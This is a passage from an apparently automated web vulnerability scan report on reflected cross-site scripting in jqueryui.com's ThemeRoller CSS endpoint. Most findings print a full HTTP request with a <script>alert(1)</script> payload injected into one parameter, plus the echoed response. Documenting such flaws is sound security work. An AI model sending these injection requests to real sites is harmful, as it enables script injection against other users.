GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png6f8c3<script>alert(1)</script>e2f9b13ed0e&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png6f8c3<script>alert(1)</script>e2f9b13ed0e&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.118. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHeader request parameter is copied into the HTML document as plain text between tags. The payload acecc<script>alert(1)</script>26b01a07e1b was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngacecc<script>alert(1)</script>26b01a07e1b&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
e, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngacecc<script>alert(1)</script>26b01a07e1b&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.119. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHover request parameter is copied into the HTML document as plain text between tags. The payload 2c125<script>alert(1)</script>6ceec36038d was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png2c125<script>alert(1)</script>6ceec36038d&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17315


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png2c125<script>alert(1)</script>6ceec36038d&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family:
...[SNIP]...

3.120. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorActive request parameter is copied into the HTML document as plain text between tags. The payload d23ac<script>alert(1)</script>4ffff291042 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaad23ac<script>alert(1)</script>4ffff291042&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaad23ac<script>alert(1)</script>4ffff291042&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1
...[SNIP]...

3.121. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorContent request parameter is copied into the HTML document as plain text between tags. The payload f629d<script>alert(1)</script>f3a6ea2ba44 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaaf629d<script>alert(1)</script>f3a6ea2ba44&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaaf629d<script>alert(1)</script>f3a6ea2ba44&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.122. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 92b1e<script>alert(1)</script>b988670b439 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d392b1e<script>alert(1)</script>b988670b439&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d392b1e<script>alert(1)</script>b988670b439&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/

...[SNIP]...

3.123. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHeader request parameter is copied into the HTML document as plain text between tags. The payload bf157<script>alert(1)</script>488388caa03 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaabf157<script>alert(1)</script>488388caa03&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaabf157<script>alert(1)</script>488388caa03&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.124. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHover request parameter is copied into the HTML document as plain text between tags. The payload 3fbde<script>alert(1)</script>8b0960fee62 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

